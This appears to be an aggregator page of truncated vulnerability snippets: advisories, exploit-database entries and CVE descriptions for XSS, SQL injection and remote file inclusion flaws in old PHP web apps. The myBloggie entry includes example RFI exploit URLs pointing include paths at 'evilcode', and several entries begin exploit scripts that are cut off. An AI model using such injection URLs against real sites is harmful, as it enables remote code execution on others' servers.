Wordpress default theme XSS (admin) and other problems

There is an XSS in the Wordpress default theme. Tested on WordPress version 2.2 Filename functions.php, line 387. Code: form style="display: inline" method="post" name="hicolor" id="hicolor" action="?php echo $SERVER'REQUESTURI'; ?" $SERVER'REQUESTURI' is directly echoed to the user. This problem...

[Full-disclosure] Wordpress default theme XSS (admin) and other problems

There is an XSS in the Wordpress default theme. Tested on WordPress version 2.2 Filename functions.php, line 387. Code: form style="display: inline" method="post" name="hicolor" id="hicolor" action="?php echo $SERVER'REQUESTURI'; ?" $SERVER'REQUESTURI' is directly echoed to the user. This problem...

mybloggie-rfi.txt

myBloggie 2.1.5 RFI Author: Yaser Homepage: http://www.ayyildiz.org Download S : http://mywebland.com/download.php?id=19 Exploits: http://site/config.php?bloggierootpath=evilcode? http://site/includes/db.php?bloggierootpath=evilcode? http://site/includes/template.php?bloggierootpath=evilcode?...

e-Vision CMS 2.02 - SQL Injection Remote Code Execution

e-Vision CMS 2.02 - SQL Injection Remote Code Execution !/usr/bin/php -q -d shortopentag=on ...need i say more? Bug 2 admin/functions.php: if isset$COOKIE'adminlang' $languageselector = $COOKIE'adminlang'; else $languageselector = "en"; include"lang/".$languageselector.".php"; ...speaks for it se...

Particle Gallery <= 1.0.1 Remote SQL Injection Exploit

Exploit for unknown platform in category web applications ====================================================== Particle Gallery setvar"COMMENTID", ""; if $GET"editcomment" "" $sql = "SELECT FROM " . $dbprefix . "comments WHERE commentid = " . dbSecure$GET"editcomment"; $cme = $db-execute$sql; i...

extreme-rfi.txt

Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : [email protected] Tested on 3.0 Pre Final And other Versions Should be infected / Script info Mod Title: Extreme PHPBB 3.0 Mod Version: 3.0 Pre Final Author: danb00 Demo:...

Monster Top List <= 1.4.2 (functions.php root_path) RFI Exploit

Exploit for unknown platform in category web applications =============================================================== Monster Top List = 1.4.2 functions.php rootpath RFI Exploit =============================================================== !/usr/bin/perl Monster Top List = 1.4.2 remote...

CVE-2007-1409

WordPress allows remote attackers to obtain sensitive information via a direct request for wp-admin/admin-functions.php, which reveals the path in an error message...

CVE-2007-1343

includes/functions.php in Craig Knudsen WebCalendar before 1.0.5 does not protect the noSet variable from external modification, which allows remote attackers to set arbitrary global variables via a URL with modified values in the noSet parameter, which leads to resultant vulnerabilities that...

Remote file inclusion

includes/functions.php in Craig Knudsen WebCalendar before 1.0.5 does not protect the noSet variable from external modification, which allows remote attackers to set arbitrary global variables via a URL with modified values in the noSet parameter, which leads to resultant vulnerabilities that...

CVE-2007-1343

includes/functions.php in Craig Knudsen WebCalendar before 1.0.5 does not protect the noSet variable from external modification, which allows remote attackers to set arbitrary global variables via a URL with modified values in the noSet parameter, which leads to resultant vulnerabilities that...

CVE-2007-1343

includes/functions.php in Craig Knudsen WebCalendar before 1.0.5 does not protect the noSet variable from external modification, which allows remote attackers to set arbitrary global variables via a URL with modified values in the noSet parameter, which leads to resultant vulnerabilities that...

CVE-2007-1343

CVE-2007-1343 concerns WebCalendar, a PHP-based calendar app. The vulnerability arises from WebCalendar’s includes/functions.php not protecting the internal variable noSet from external modification, enabling remote attackers to overwrite variables via a URL-modified noSet parameter, which can le...

WebCalendar includes/functions.php noSet Variable Overwrite

The version of WebCalendar installed on the remote host allows an attacker to overwrite the 'noSet' array used by the application to protect selected global variables. By leveraging this issue, an unauthenticated, remote attacker can gain control of protected global variables, which could lead to...

CVE-2007-1230

Multiple cross-site scripting XSS vulnerabilities in wp-includes/functions.php in WordPress before 2.1.2-alpha allow remote attackers to inject arbitrary web script or HTML via 1 the Referer HTTP header or 2 the URI, a different vulnerability than CVE-2007-1049...

WordPress <= 2.1.1 - Multiple XSS

Because of these vulnerabilities in wp-includes/functions.php, the attackers can inject arbitrary web script or HTML. Solution Update the WordPress to the latest available version at least 2.1.2...

Sql injection

Multiple SQL injection vulnerabilities in Mathis Dirksen-Thedens ZephyrSoft Toolbox Address Book Continued ABC 1.00 allow remote attackers to execute arbitrary SQL commands via the id parameter to the 1 updateRow and 2 deleteRow functions in functions.php. NOTE: some of these details are obtained...

Remote file inclusion

PHP remote file inclusion vulnerability in functions.php in Extreme phpBB aka phpBB Extreme 3.0.1 allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter...

Extreme phpBB 3.0.1 (functions.php) Remote File Include Exploit

Exploit for unknown platform in category web applications =============================================================== Extreme phpBB 3.0.1 functions.php Remote File Include Exploit =============================================================== C xoron Name: phpBB Extreme 3.0.1 phpbbrootpath...

Extreme phpBB 3.0.1 - functions.php Remote File Inclusion

Extreme phpBB 3.0.1 - functions.php Remote File Inclusion C xoron Name: phpBB Extreme 3.0.1 phpbbrootpath Remote File Include Exploit Author: xoron Exploit coded by xoron Download: http://sourceforge.net/project/showfiles.php?groupid=95900 Tesekkurler: pang0, DJR POC:...